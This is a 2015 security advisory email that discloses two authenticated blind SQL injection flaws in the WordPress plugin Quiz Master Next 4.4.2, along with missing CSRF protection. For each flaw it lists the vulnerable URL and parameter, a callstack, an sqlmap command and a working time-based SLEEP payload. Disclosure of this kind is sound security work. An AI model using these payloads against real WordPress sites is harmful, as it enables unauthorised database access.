Subject: Blind SQL injections in Quiz Master Next 4.4.2
Date: Thu, 16 Jul 2015 13:54:30 +0200

Hello,

Plugin: Quiz Master Next 4.4.2 https://wordpress.org/plugins/quiz-master-next/

Authenticated users (like editors) can execute arbitrary SQL commands (+there is no CSRF protection).

1. SQL injection (mlw_options_tools_tab_content())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=tools
Vulnerable parameter: mlw_reset_quiz_id

Example PHP callstack:

Callstack:
  mlw_options_tools_tab_content   [/quiz-master-next/php/qmn_options_tools_tab.php:34]
  wpdb::query


Verification:

sqlmap --cookie "..." --dbms mysql --data "mlw_reset_quiz_stats=confirmation&mlw_reset_quiz_id=1" -u "http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=tools" -p mlw_reset_quiz_id

...
Parameter: mlw_reset_quiz_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: mlw_reset_quiz_stats=confirmation&mlw_reset_quiz_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))uqUv)
...


2. SQL injection (mlw_options_text_tab_content())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=text
Vulnerable parameter: quiz_id

Example PHP callstack:
Callstack:
  mlw_options_text_tab_content   [/quiz-master-next/php/qmn_options_text_tab.php:52]
  wpdb::query


Verification:

sqlmap --cookie "..." --dbms mysql --data "save_templates=confirmation&quiz_id=1" -u "http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=text" -p quiz_id

...
Parameter: quiz_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: save_templates=confirmation&quiz_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YUSm)
...


--
Regards,
Marcin Probola,